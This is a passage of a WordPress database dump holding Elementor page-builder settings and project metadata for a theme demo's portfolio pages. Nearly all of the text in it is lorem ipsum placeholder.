porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(1020,657,'_elementor_page_assets','a:0:{}'),(1021,657,'_thumbnail_id','1160'),(1023,662,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(1024,662,'ova_project_service','Interior design'),(1025,662,'ova_project_architect','Mike hardson'),(1026,662,'ova_project_duration','4.5 Months'),(1027,662,'ova_project_location','Broklyn, New York'),(1028,662,'_elementor_edit_mode','builder'),(1029,662,'_elementor_template_type','wp-post'),(1030,662,'_elementor_version','3.6.6'),(1031,662,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:87:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/philip-johnson/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:94:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/philip-johnson/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:102:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/philip-johnson/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:88:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/philip-johnson/\";}}'),(1032,662,'_wp_page_template','default'),(1033,662,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Philip Johnson\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(1034,662,'_elementor_page_assets','a:0:{}'),(1035,662,'_thumbnail_id','1161'),(1037,665,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(1038,665,'ova_project_service','Interior design'),(1039,665,'ova_project_architect','Mike hardson'),(1040,665,'ova_project_duration','4.5 Months'),(1041,665,'ova_project_location','Broklyn, New York'),(1042,665,'_elementor_edit_mode','builder'),(1043,665,'_elementor_template_type','wp-post'),(1044,665,'_elementor_version','3.6.6'),(1045,665,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:87:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/richard-rogers/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:94:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/richard-rogers/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:102:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/richard-rogers/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:88:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/richard-rogers/\";}}'),(1046,665,'_wp_page_template','default'),(1047,665,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Richard Rogers\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui 